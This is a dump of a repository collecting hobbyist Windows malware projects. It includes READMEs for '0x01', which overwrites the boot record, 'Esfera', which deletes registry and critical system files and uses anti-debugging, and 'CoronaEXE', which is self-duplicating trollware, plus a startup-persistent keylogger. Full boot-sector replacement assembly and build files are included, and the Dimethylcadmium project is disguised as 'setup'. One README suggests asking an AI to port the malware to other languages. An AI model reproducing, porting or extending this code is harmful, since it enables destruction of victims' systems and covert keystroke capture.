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+ # 🤔 What the HELL did I just stumble upon?
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+ 0x01 (hex code for 1) is a variation of the Wacatac, KillMBR and Generic trojan, that doesn't work on systems made after Windows XP, and doesn't activate on May 20th (for personal reasons).
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+
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+ This can:
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+ - Overwrite the boot record (first 64 sectors)
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+ - Add a registry key
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+ - Copy itself to system directories
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+ - Set itself as a critical process (failed)
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+ - Hook and change window text to NULL
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+ - Also exploits multiple vulnerabilities in the gdi32.dll and msimg32.dll critical files to display GDI.
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+
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+ > [!NOTE]
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+ > The safe version doesn't destroy the PC, instead it only displays effects
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+ >
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+ > Password to the ZIP file: one
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+
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+ # ❤️ For skids
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+ I know you may either say it's skidded or skid from it, so for that, I added a MIT licence to this malware, so you can't use my source code without my permission, and you must also leave a copyright notice when using my source code.
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+ I made a mistake by saying it was from Joshua, it's actually from @TheMaynMike Sorry.
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+ BITS 16
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+ org 0x7c00
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+
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+ ; Format -> Binary file
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+ ; Base Address: 0000h Range: 0000h - 0200h Loaded length: 0200h -> 512 bytes
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+
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+ ; the way that the actual bootloader code organisation of is a total mess, so i had to fix it
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+ ; and way optimize it
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+
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+ segments:
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+ push 0x0A000
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+ pop es
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+ xor ax, ax
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+ xor di, di
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+
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+ mov ax, 13h
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+ int 10h
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+
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+ ; print the pixels
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+ x1:
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+ mov ah, 0x0c
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+ inc al ; color
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+ xor bh, bh ; page
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+ inc cx ; x
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+ int 10h
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+ cmp cx, 0xFFFF
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+ je keyboard
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+ jmp x1
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+
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+ keyboard:
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+ mov ax, 0
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+ int 16h
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+
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+ mov ah, 0
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+ mov al, 3
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+ int 10h
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+
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+ mov si, msg
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+
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+ print:
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+ push ax
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+ cld
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+
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+ next:
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+ mov al,[si]
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+ cmp al,0
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+ je done
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+ call printchar
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+ inc si
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+ jmp next
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+
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+ done:
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+ mov ax, 0
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+ int 16h
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+ ; ineficient way
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+ jmp segments
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+
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+ printchar:
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+ mov ah,0x0e
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+ int 0x10
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+ ret
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+
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+
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+ msg db "AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA AiVDsDOsA",0
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+
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+ times 510 - ($-$$) db 0
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+ dw 0xaa55
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+
24
+ For more information, please refer to <https://unlicense.org>
src/CFISources-main/README.md ADDED
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1
+ # CFISources
2
+ My Sources from used malwares
3
+
4
+ You can ask the AI to convert it to another Programming Languages
src/CUBEOSGITCH-main/README.md ADDED
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1
+ CUBO BOOTLOADER IN ASSEMBLY STILE SOLARIS :)
2
+ ![vbox2](https://github.com/user-attachments/assets/85eb2a43-25d2-41e7-b71b-cdb35d2f96c7)
src/CUBEOSGITCH-main/code2.asm ADDED
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1
+ [BITS 16]
2
+ [ORG 0x7C00] ; Boot sector origin
3
+
4
+ %define WSCREEN 320
5
+ %define HSCREEN 200
6
+ %define WCUBE 60
7
+
8
+ jmp short Start
9
+ nop
10
+
11
+ ; Disk signature (optional)
12
+ Signature db 0xAA, 0x55
13
+
14
+ Start:
15
+ ;Setup Mode 13h
16
+ mov ax, 0x0013
17
+ int 0x10
18
+
19
+ ;Init FPU
20
+ fninit
21
+
22
+ ResetDraw:
23
+ ; Integer time
24
+ inc word [i]
25
+
26
+ cmp word [i], 1500
27
+ jae done_reset_draw
28
+
29
+ ; time += dtime
30
+ ; time += 0.90 (substantially increased dtime for very fast rotation)
31
+ fld dword [time]
32
+ fadd dword [dtime]
33
+ fstp dword [time]
34
+
35
+ ; r1 = sin(time)
36
+ fld dword [time]
37
+ fsin
38
+ fstp dword [r1]
39
+
40
+ ; r2 = cos(time)
41
+ fld dword [time]
42
+ fcos
43
+ fstp dword [r2]
44
+
45
+ call ClearBuffers
46
+
47
+ mov cx, WCUBE
48
+ .loopY:
49
+ mov ax, -WCUBE
50
+ .loopX:
51
+ call DrawCubePixel
52
+
53
+ ; Face rotation
54
+ xchg bx, cx
55
+ neg bx
56
+
57
+ dec si
58
+ cmp si, 0x00
59
+ jnz .loopX
60
+
61
+ ; Rotate 90 deg around Y
62
+ xchg ax, cx
63
+ neg cx
64
+ call DrawCubePixel
65
+
66
+ ; Rotate other face by 180 deg around Y
67
+ neg ax
68
+ neg cx
69
+ call DrawCubePixel
70
+
71
+ ; Rotate 90 deg again
72
+ xchg ax, cx
73
+ neg cx
74
+
75
+ ; 6 Faces
76
+ mov si, 0x06
77
+
78
+ inc ax
79
+ cmp ax, WCUBE
80
+ jne .loopX
81
+
82
+ inc bx
83
+ cmp bx, WCUBE
84
+ jne .loopY
85
+
86
+ call RenderVGA
87
+
88
+ jmp ResetDraw
89
+
90
+ done_reset_draw:
91
+ ; Infinite loop or other code if necessary
92
+ jmp done_reset_draw
93
+
94
+ DrawCubePixel:
95
+ pushad
96
+
97
+ ; Store X, Y, Z
98
+ mov word [x], ax
99
+ mov word [y], bx
100
+ mov word [z], cx
101
+
102
+ ; Convert int to float
103
+ fild word [x]
104
+ fstp dword [x]
105
+ fild word [y]
106
+ fstp dword [y]
107
+ fild word [z]
108
+ fstp dword [z]
109
+
110
+ ; X Rotation:
111
+ ; Y = cos * Y - sin * Z
112
+ ; Z = sin * Y + cos * Z
113
+ fld dword [r1]
114
+ fld dword [r2]
115
+
116
+ fld dword [y]
117
+ fmul st0, st1
118
+ fld dword [z]
119
+ fmul st0, st3
120
+ fsubp
121
+
122
+ fld dword [y]
123
+ fmul st0, st3
124
+ fld dword [z]
125
+ fmul st0, st3
126
+ faddp
127
+
128
+ fstp dword [z]
129
+ fstp dword [y]
130
+
131
+ fstp st0
132
+ fstp st0
133
+
134
+ ; Y Rotation:
135
+ ; X = cos * X + sin * Z
136
+ ; Z = cos * Z - sin * X
137
+ fld dword [r1]
138
+ fld dword [r2]
139
+
140
+ fld dword [x]
141
+ fmul st0, st1
142
+ fld dword [z]
143
+ fmul st0, st3
144
+ faddp
145
+
146
+ fld dword [x]
147
+ fmul st0, st3
148
+ fld dword [z]
149
+ fmul st0, st3
150
+ fsubp
151
+
152
+ ; Convert our depth value to an integer that fits in a byte
153
+ fld st0
154
+ fmul dword [zbuffer_scale]
155
+ fistp word [z]
156
+ fadd dword [z_add]
157
+
158
+ ; Perform perspective projection
159
+ fld dword [y]
160
+ fdiv st0, st1
161
+ fmul dword [scr_scale]
162
+ fistp word [y]
163
+ fdivp st1, st0
164
+ fmul dword [scr_scale]
165
+ fistp word [x]
166
+
167
+ fstp st0
168
+ fstp st0
169
+
170
+ ; (X ^ Y) / 8
171
+ xor ax, bx
172
+ shr ax, 0x03
173
+ mov si, ax
174
+
175
+ ; 0x0F Interval
176
+ and si, 0x0F
177
+
178
+ mov bl, byte [palette + si]
179
+ mov si, word [x]
180
+ mov di, word [y]
181
+
182
+ ; Go to the center
183
+ add si, WSCREEN / 2
184
+ add di, HSCREEN / 2
185
+
186
+ cmp si, WSCREEN
187
+ jge .skip
188
+ test si, si
189
+ js .skip
190
+
191
+ cmp di, HSCREEN
192
+ jge .skip
193
+ test di, di
194
+ js .skip
195
+
196
+ ; Index = Y * 320 + X
197
+ imul di, di, 320
198
+ add di, si
199
+
200
+ ; Load Z-Buffer in memory
201
+ push 0x7E00 ; Assuming Z-Buffer starts at 0x7E00
202
+ pop es
203
+
204
+ ; Check if Z is greater than
205
+ ; the one in Z-Buffer
206
+ mov al, byte [z]
207
+ cmp al, byte [es:di]
208
+ jge .skip
209
+
210
+ ; Put new Z value into the Z-Buffer
211
+ mov byte [es:di], al
212
+
213
+ push 0x7C00 ; Assuming Pixel Buffer starts at 0x7C00
214
+ pop es
215
+
216
+ ; Set Pixel
217
+ mov byte [es:di], bl
218
+
219
+ .skip:
220
+ popad
221
+ ret
222
+
223
+ ClearBuffers:
224
+ ; Z Buffer -> 0x7E00
225
+ push 0x7E00
226
+ pop es
227
+
228
+ ; Fill Z Buffer with 0x7F
229
+ mov cx, WSCREEN * HSCREEN
230
+ mov al, 0x7F
231
+ xor di, di
232
+ rep stosb
233
+
234
+ ; Pixel Buffer -> 0x7C00
235
+ push 0x7C00
236
+ pop es
237
+
238
+ ; Fill Pixel Buffer with 0x00
239
+ mov cx, WSCREEN * HSCREEN
240
+ xor di, di
241
+ rep stosb
242
+
243
+ ret
244
+
245
+ RenderVGA:
246
+ push ds
247
+
248
+ push 0x7C00
249
+ pop ds
250
+
251
+ push 0xA000
252
+ pop es
253
+
254
+ mov cx, WSCREEN * HSCREEN
255
+ xor si, si
256
+ xor di, di
257
+ rep movsb
258
+
259
+ pop ds
260
+ ret
261
+
262
+ ; Variables and Constants
263
+ i dw 0
264
+
265
+ time dd 0.0
266
+ dtime dd 0.90 ; Substantially increased dtime for very fast rotation
267
+
268
+ z_add dd 300.0
269
+ zbuffer_scale dd 1.2
270
+ scr_scale dd 160.0
271
+
272
+ r1 dd 0.0
273
+ r2 dd 0.0
274
+
275
+ x dd 0.0
276
+ y dd 0.0
277
+ z dd 0.0
278
+
279
+ palette:
280
+ db 0x20, 0x21, 0x22, 0x23
281
+ db 0x24, 0x25, 0x26, 0x27
282
+ db 0x28, 0x29, 0x2A, 0x2B
283
+ db 0x2C, 0x2D, 0x2E, 0x2F
284
+
285
+ ; Pad to 512 bytes (if needed)
286
+ times 510 - ($ - $$) db 0
287
+ dw 0xAA55 ; Boot signature
src/CUBEOSGITCH-main/cubeOsglitch.img ADDED
Binary file (512 Bytes). View file
 
src/Corona.exe-main/LICENSE ADDED
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1
+ MIT License
2
+
3
+ Copyright (c) 2020 Hackernese
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
src/Corona.exe-main/README.md ADDED
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1
+ ![Test Image 1](/preview.jpg)
2
+ # CoronaEXE
3
+
4
+ Just a little piece of trollware ( malware for trolling ) that i made when i was bored. Dubbed it "CoronaEXE.exe" just like what Covid19 does, it duplicates itself in a very aggressive once in contact with someone ( in this case, when you touch its GUI-close button :} ) and it also spreads very fast. Feel free not to run it or do it if it please you. :P
5
+ ##### The table below describes each property of the malware :
6
+ | Data | Description |
7
+ | ------------- | ------------- |
8
+ | File description |CoronaEXE|
9
+ | Type | Application|
10
+ | Extension | (.exe) |
11
+ | How dangerous | `Low` |
12
+ | File version |1.0.0.0|
13
+ | Product name |Corona.EXE|
14
+ | Size | 898 KB|
15
+ | Language |Language Neutral|
16
+
17
+ ##### Demo :
18
+ ![Test Image 1](/corogif.gif)
19
+ ### Build :
20
+ ---
21
+ - Wonder where did the actual executable go and you wanna try it out ? In order to avoid script kiddies, i have deleted the piece of malware in my project, if you wish to try it out, compile my source codes from my repository in order to obtain it.
22
+ - if you are intending to record my malware in action without virtualizing it in any kind of VM, compile the soure codes in the `CoroRecord` directory. Please note that that version doesn't support all kind of Desktop-recording software, only a few listed below :
23
+ ```
24
+ 1. OBS Studio ( obsproject.com )
25
+ 2. ShareX ( getsharex.com )
26
+ 3. Free Cam ( freescreenrecording.com )
27
+ 4. Camtasia ( techsmith.com ) NOT YET
28
+ 5. Camstudio ( camstudio.org )
29
+ 6. Ezvid ( ezvid.com )
30
+ 7. filmora ( filmora.wondershare.net )
31
+ ```
32
+ - Apart from any of those, the malware will automatically shut down the rest without hesitation, if one wish to record it with another Desktop-recording program, issue a request and i will try to add it in.
33
+ ### Disclaimer :
34
+ ---
35
+ - Please note that i only made this malware for fun and i `won't be taking` any `responsibility` upon any of your actions if you try to abuse this executable for `mischievous purposes`. This malware doesn't have any devastating consequence but still very annoying once executed.
36
+ - To avoid script kiddies who only copy and paste malware to wreck havoc, i have deleted my self-built executable, if you wanna try it out, compile my codes and obtain it.
37
+
38
+
39
+ ### Credits :
40
+ ---
41
+ - Created by me : `ZenixOwler`.
42
+
43
+
44
+
45
+ ©COPYRIGHT@2020 Hackernese - ZenixOwler
src/Dimethylcadmium source code/Dimethylcadmium.dev ADDED
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1
+ [Project]
2
+ FileName=Dimethylcadmium.dev
3
+ Name=Dimethylcadmium
4
+ Type=0
5
+ Ver=2
6
+ ObjFiles=
7
+ Includes=
8
+ Libs=
9
+ PrivateResource=Dimethylcadmium_private.rc
10
+ ResourceIncludes=
11
+ MakeIncludes=
12
+ Compiler=-lgdi32 -lwinmm -lntdll -lkernel32_@@_
13
+ CppCompiler=-lgdi32 -lwinmm -lntdll -lkernel32_@@_
14
+ Linker=-s_@@_"../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libgdi32.a"_@@_"../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libkernel32.a"_@@_"../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libntdll.a"_@@_"../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libwinmm.a"_@@_
15
+ IsCpp=1
16
+ Icon=Dimethylcadmium.ico
17
+ ExeOutput=
18
+ ObjectOutput=
19
+ LogOutput=
20
+ LogOutputEnabled=0
21
+ OverrideOutput=0
22
+ OverrideOutputName=Dimethylcadmium.exe
23
+ HostApplication=
24
+ UseCustomMakefile=0
25
+ CustomMakefile=
26
+ CommandLine=
27
+ Folders=
28
+ IncludeVersionInfo=1
29
+ SupportXPThemes=0
30
+ CompilerSet=3
31
+ CompilerSettings=0000000100000000000000000
32
+ UnitCount=1
33
+
34
+ [VersionInfo]
35
+ Major=6
36
+ Minor=6
37
+ Release=6
38
+ Build=6
39
+ LanguageID=1033
40
+ CharsetID=1252
41
+ CompanyName=
42
+ FileVersion=6.6.6.6
43
+ FileDescription=setup
44
+ InternalName=
45
+ LegalCopyright=
46
+ LegalTrademarks=
47
+ OriginalFilename=
48
+ ProductName=
49
+ ProductVersion=6.6.6.6
50
+ AutoIncBuildNr=0
51
+ SyncProduct=1
52
+
53
+ [Unit1]
54
+ FileName=main.cpp
55
+ CompileCpp=1
56
+ Folder=
57
+ Compile=1
58
+ Link=1
59
+ Priority=1000
60
+ OverrideBuildCmd=0
61
+ BuildCmd=
62
+
src/Dimethylcadmium source code/Dimethylcadmium.ico ADDED
src/Dimethylcadmium source code/Dimethylcadmium.layout ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ [Editors]
2
+ Order=0
3
+ Focused=0
4
+ [Editor_0]
5
+ CursorCol=10
6
+ CursorRow=2338
7
+ TopLine=2334
8
+ LeftChar=1
src/Dimethylcadmium source code/Dimethylcadmium_private.h ADDED
@@ -0,0 +1,23 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ /* THIS FILE WILL BE OVERWRITTEN BY DEV-C++ */
2
+ /* DO NOT EDIT ! */
3
+
4
+ #ifndef DIMETHYLCADMIUM_PRIVATE_H
5
+ #define DIMETHYLCADMIUM_PRIVATE_H
6
+
7
+ /* VERSION DEFINITIONS */
8
+ #define VER_STRING "6.6.6.6"
9
+ #define VER_MAJOR 6
10
+ #define VER_MINOR 6
11
+ #define VER_RELEASE 6
12
+ #define VER_BUILD 6
13
+ #define COMPANY_NAME ""
14
+ #define FILE_VERSION "6.6.6.6"
15
+ #define FILE_DESCRIPTION "setup"
16
+ #define INTERNAL_NAME ""
17
+ #define LEGAL_COPYRIGHT ""
18
+ #define LEGAL_TRADEMARKS ""
19
+ #define ORIGINAL_FILENAME ""
20
+ #define PRODUCT_NAME ""
21
+ #define PRODUCT_VERSION "6.6.6.6"
22
+
23
+ #endif /*DIMETHYLCADMIUM_PRIVATE_H*/
src/Dimethylcadmium source code/Dimethylcadmium_private.rc ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ /* THIS FILE WILL BE OVERWRITTEN BY DEV-C++ */
2
+ /* DO NOT EDIT! */
3
+
4
+ #include <windows.h> // include for version info constants
5
+
6
+
7
+ A ICON "Dimethylcadmium.ico"
8
+
9
+ //
10
+ // TO CHANGE VERSION INFORMATION, EDIT PROJECT OPTIONS...
11
+ //
12
+ 1 VERSIONINFO
13
+ FILEVERSION 6,6,6,6
14
+ PRODUCTVERSION 6,6,6,6
15
+ FILETYPE VFT_APP
16
+ {
17
+ BLOCK "StringFileInfo"
18
+ {
19
+ BLOCK "040904E4"
20
+ {
21
+ VALUE "CompanyName", ""
22
+ VALUE "FileVersion", "6.6.6.6"
23
+ VALUE "FileDescription", "setup"
24
+ VALUE "InternalName", ""
25
+ VALUE "LegalCopyright", ""
26
+ VALUE "LegalTrademarks", ""
27
+ VALUE "OriginalFilename", ""
28
+ VALUE "ProductName", ""
29
+ VALUE "ProductVersion", "6.6.6.6"
30
+ }
31
+ }
32
+ BLOCK "VarFileInfo"
33
+ {
34
+ VALUE "Translation", 0x0409, 1252
35
+ }
36
+ }
src/Dimethylcadmium source code/Dimethylcadmium_private.res ADDED
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src/Dimethylcadmium source code/Makefile.win ADDED
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1
+ # Project: Dimethylcadmium
2
+ # Makefile created by Dev-C++ 5.11
3
+
4
+ CPP = g++.exe
5
+ CC = gcc.exe
6
+ WINDRES = windres.exe
7
+ RES = Dimethylcadmium_private.res
8
+ OBJ = main.o $(RES)
9
+ LINKOBJ = main.o $(RES)
10
+ LIBS = -L"C:/Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32" -static-libgcc -s -mwindows -s "../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libgdi32.a" "../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libkernel32.a" "../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libntdll.a" "../../../Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/lib32/libwinmm.a" -m32
11
+ INCS = -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/include" -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/include" -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/lib/gcc/x86_64-w64-mingw32/4.9.2/include"
12
+ CXXINCS = -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/include" -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/x86_64-w64-mingw32/include" -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/lib/gcc/x86_64-w64-mingw32/4.9.2/include" -I"C:/Program Files (x86)/Dev-Cpp/MinGW64/lib/gcc/x86_64-w64-mingw32/4.9.2/include/c++"
13
+ BIN = Dimethylcadmium.exe
14
+ CXXFLAGS = $(CXXINCS) -m32 -lgdi32 -lwinmm -lgdi32 -lwinmm -lntdll -lkernel32
15
+ CFLAGS = $(INCS) -m32 -lgdi32 -lwinmm -lgdi32 -lwinmm -lntdll -lkernel32
16
+ RM = rm.exe -f
17
+
18
+ .PHONY: all all-before all-after clean clean-custom
19
+
20
+ all: all-before $(BIN) all-after
21
+
22
+ clean: clean-custom
23
+ ${RM} $(OBJ) $(BIN)
24
+
25
+ $(BIN): $(OBJ)
26
+ $(CPP) $(LINKOBJ) -o $(BIN) $(LIBS)
27
+
28
+ main.o: main.cpp
29
+ $(CPP) -c main.cpp -o main.o $(CXXFLAGS)
30
+
31
+ Dimethylcadmium_private.res: Dimethylcadmium_private.rc
32
+ $(WINDRES) -i Dimethylcadmium_private.rc -F pe-i386 --input-format=rc -o Dimethylcadmium_private.res -O coff
33
+
src/Dimethylcadmium source code/main.cpp ADDED
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src/Dimethylcadmium source code/main.o ADDED
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src/Ebola-main/Ebola.sln ADDED
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1
+ 
2
+ Microsoft Visual Studio Solution File, Format Version 12.00
3
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4
+ VisualStudioVersion = 16.0.31613.86
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+ MinimumVisualStudioVersion = 10.0.40219.1
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+ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Ebola", "Ebola\Ebola.vcxproj", "{C7BC7705-93AF-4244-AAAF-3215D10AF787}"
7
+ EndProject
8
+ Global
9
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
10
+ Debug|x64 = Debug|x64
11
+ Debug|x86 = Debug|x86
12
+ Release|x64 = Release|x64
13
+ Release|x86 = Release|x86
14
+ EndGlobalSection
15
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
16
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Debug|x64.ActiveCfg = Debug|x64
17
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Debug|x64.Build.0 = Debug|x64
18
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Debug|x86.ActiveCfg = Debug|Win32
19
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Debug|x86.Build.0 = Debug|Win32
20
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Release|x64.ActiveCfg = Release|x64
21
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Release|x64.Build.0 = Release|x64
22
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Release|x86.ActiveCfg = Release|Win32
23
+ {C7BC7705-93AF-4244-AAAF-3215D10AF787}.Release|x86.Build.0 = Release|Win32
24
+ EndGlobalSection
25
+ GlobalSection(SolutionProperties) = preSolution
26
+ HideSolutionNode = FALSE
27
+ EndGlobalSection
28
+ GlobalSection(ExtensibilityGlobals) = postSolution
29
+ SolutionGuid = {26F0E1FD-4C23-498A-9C7D-75FB5B1BCF8D}
30
+ EndGlobalSection
31
+ EndGlobal
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1
+ 
2
+ Microsoft Visual Studio Solution File, Format Version 12.00
3
+ # Visual Studio Version 16
4
+ VisualStudioVersion = 16.0.32413.511
5
+ MinimumVisualStudioVersion = 10.0.40219.1
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+ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Encryptor", "Encryptor\Encryptor.csproj", "{884074DB-E6B2-41D1-AB5A-F03ECC74FFE3}"
7
+ EndProject
8
+ Global
9
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
10
+ Debug|Any CPU = Debug|Any CPU
11
+ Release|Any CPU = Release|Any CPU
12
+ EndGlobalSection
13
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
14
+ {884074DB-E6B2-41D1-AB5A-F03ECC74FFE3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15
+ {884074DB-E6B2-41D1-AB5A-F03ECC74FFE3}.Debug|Any CPU.Build.0 = Debug|Any CPU
16
+ {884074DB-E6B2-41D1-AB5A-F03ECC74FFE3}.Release|Any CPU.ActiveCfg = Release|Any CPU
17
+ {884074DB-E6B2-41D1-AB5A-F03ECC74FFE3}.Release|Any CPU.Build.0 = Release|Any CPU
18
+ EndGlobalSection
19
+ GlobalSection(SolutionProperties) = preSolution
20
+ HideSolutionNode = FALSE
21
+ EndGlobalSection
22
+ GlobalSection(ExtensibilityGlobals) = postSolution
23
+ SolutionGuid = {027D6447-12DA-4631-AE4B-F09E747DC32E}
24
+ EndGlobalSection
25
+ EndGlobal
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1
+ 
2
+ Microsoft Visual Studio Solution File, Format Version 12.00
3
+ # Visual Studio Version 17
4
+ VisualStudioVersion = 17.4.33110.190
5
+ MinimumVisualStudioVersion = 10.0.40219.1
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+ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Esfera", "Esfera\Esfera.vcxproj", "{BF84FEBE-E357-43EA-B77E-AFB36AAD656F}"
7
+ EndProject
8
+ Global
9
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
10
+ Debug|x64 = Debug|x64
11
+ Debug|x86 = Debug|x86
12
+ Release|x64 = Release|x64
13
+ Release|x86 = Release|x86
14
+ EndGlobalSection
15
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
16
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Debug|x64.ActiveCfg = Debug|x64
17
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Debug|x64.Build.0 = Debug|x64
18
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Debug|x86.ActiveCfg = Debug|Win32
19
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Debug|x86.Build.0 = Debug|Win32
20
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Release|x64.ActiveCfg = Release|x64
21
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Release|x64.Build.0 = Release|x64
22
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Release|x86.ActiveCfg = Release|Win32
23
+ {BF84FEBE-E357-43EA-B77E-AFB36AAD656F}.Release|x86.Build.0 = Release|Win32
24
+ EndGlobalSection
25
+ GlobalSection(SolutionProperties) = preSolution
26
+ HideSolutionNode = FALSE
27
+ EndGlobalSection
28
+ GlobalSection(ExtensibilityGlobals) = postSolution
29
+ SolutionGuid = {896FDB0D-EAD8-4E94-94C4-249BE2C2AF9B}
30
+ EndGlobalSection
31
+ EndGlobal
src/Esfera.exe-main/README.md ADDED
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1
+ # Esfera.exe
2
+ The best GDI Malware i ever made in 5 months
3
+
4
+ # NOTE:
5
+ - The creator does not take any responsibilities for any damages caused by using this malicious piece of software, outside of a virtual environment
6
+ - Esfera does not work on Windows with DWM(Desktop Window Manager): Windows 7, Windows 8/8.1, Windows 10 and Windows 11
7
+
8
+ # Features:
9
+ - Written in C and x86 assembly
10
+ - 20 layered GDI shaders, 19 Audio sequences and 4 GDI payloads
11
+ - A fake RSOD inspired by Sulfoxide
12
+ - A debug panel where you can modify Esfera behaviour
13
+ - Sets itself as a critical process
14
+ - Shutdowns pc through undocumented NT functions
15
+ - Deletes all registrys, and critical files such as: ntoskrnl, hal.dll, winresume.exe, winload.exe, logonui.exe and more...
16
+ - An anti debugger(don't try)
17
+ - A dated timed payload(guess the execution date :trol:)
18
+
19
+ # Debug Panel:
20
+ - Open cmd and type "esfera -?" in order to open the Debug panel with all supported commands
src/Keylogger-KeyStroke-logging-main/README.md ADDED
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1
+ # **Keylogger/KeyStroke-logging**
2
+ Keylogger is a type of software, that is used for tracking keystrokes. It doesn't always have to be used for malicious purposes. For instance, the tracking can be used for analyzing and improving search engines based on what people search on a day-to-day basis. Some companies use keyloggers to make sure that employees do their work correctly.
3
+
4
+ When it comes to malicious keylogger, simply put keylogger malware then we usually talk about sending information to someone else without the user's knowledge. This information is typically used for breaking into some device, system or just spying for other reasons...
5
+ ## **Description**
6
+ > [!WARNING]
7
+ > This was not created for malicious purposes. Everything was built just for demonstration and education. I'm not responsible for any caused problems with law.
8
+
9
+ I created a basic Keylogger in [C#](https://learn.microsoft.com/en-us/dotnet/csharp/) with [WIN API](https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list).
10
+
11
+ After launch, the keylogger throw fake error message and then it set itself as a startup application. Later on it write kdata.txt where every keystore will be stored.
12
+ Then it just do its thing repeatedly until the user Log Out.
13
+
14
+ Keep in mind that other keyloggers usually send the information to attacker via network. In this case, it just store information in *kdata.txt*. This keylogger is offline which means, nothing bad can happen :)
15
+
16
+ ### **Screenshots**
17
+ *Thrown fake error message*
18
+
19
+ ![Screenshot 2024-07-02 094745](https://github.com/MalwareStudio/Keylogger-KeyStroke-logging/assets/49496834/b344f98d-f823-41b0-bef1-ccffa8a1aa1c)
20
+
21
+ *Keylogger directory and its data*
22
+
23
+ ![Screenshot 2024-07-02 094818](https://github.com/MalwareStudio/Keylogger-KeyStroke-logging/assets/49496834/e8590083-08c0-46d2-9b2c-ec89994522b1)
24
+
25
+ *Keystroke data*
26
+
27
+ ![Screenshot 2024-07-02 094855](https://github.com/MalwareStudio/Keylogger-KeyStroke-logging/assets/49496834/c52b40e4-1272-419b-baf4-0719b8f21122)
28
+
29
+ *Copy of keylogger*
30
+
31
+ ![Screenshot 2024-07-02 094925](https://github.com/MalwareStudio/Keylogger-KeyStroke-logging/assets/49496834/2b835908-57b4-48cb-acfd-ba16c230f960)
32
+
33
+ *Registry value for autostart*
34
+
35
+ ![Screenshot 2024-07-02 095809](https://github.com/MalwareStudio/Keylogger-KeyStroke-logging/assets/49496834/5a9ce485-a358-43e2-8a36-9877b9d92745)
36
+
37
+ ## **Details**
38
+
39
+ Built in: C# [netframework 4.0](https://www.microsoft.com/en-us/download/details.aspx?id=17851)
40
+
41
+ External Components: WIN API
42
+
43
+ Application type: Windows Application
44
+
45
+ File extention: .exe
46
+
47
+ UAC required: no
48
+
49
+ Internal destruction *(e.g manipulation with personal files)*: no
50
+
51
+ External destruction *(e.g stealing password)*: no, but possible
52
+
53
+ **Affected directories**
54
+ ```
55
+ C:\Users\jena0\AppData\Roaming\Microsoft - keylogger copy and keystroke data
56
+ ```
57
+ **Affected Registry Keys&Values**
58
+ ```
59
